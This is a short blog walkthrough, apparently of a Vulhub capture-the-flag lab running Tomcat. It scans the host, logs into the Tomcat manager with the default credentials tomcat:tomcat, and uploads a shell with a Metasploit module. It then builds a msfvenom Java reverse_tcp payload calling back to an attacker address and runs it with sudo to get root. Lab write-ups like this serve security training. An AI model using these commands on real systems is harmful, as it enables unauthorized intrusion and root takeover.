Posted on

Vulhub – My Tomcat Host Walkthrough

Scanning the host with nmap –A –T4 –p- 192.168.1.10

And with dirb http://192.168.1.10

The page http://192.168.1.10:8080/manager/html we can access it using the default credentials tomcat:tomcat

Ok now that we can login, we can use Msfconsole to upload a shell, use exploit/multi/http/tomcat_mgr_upload

Ok now running LinEnum.sh script gave me a lot of informations:

We’re going to create a jar exploit like this :

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=3333 -f raw -o exploit.jar

Then transfer the file to the target and we rung this command:

sudo /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar exploit.jar

And we get a shell as root

Navigate to the root folder and catch the flag:

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s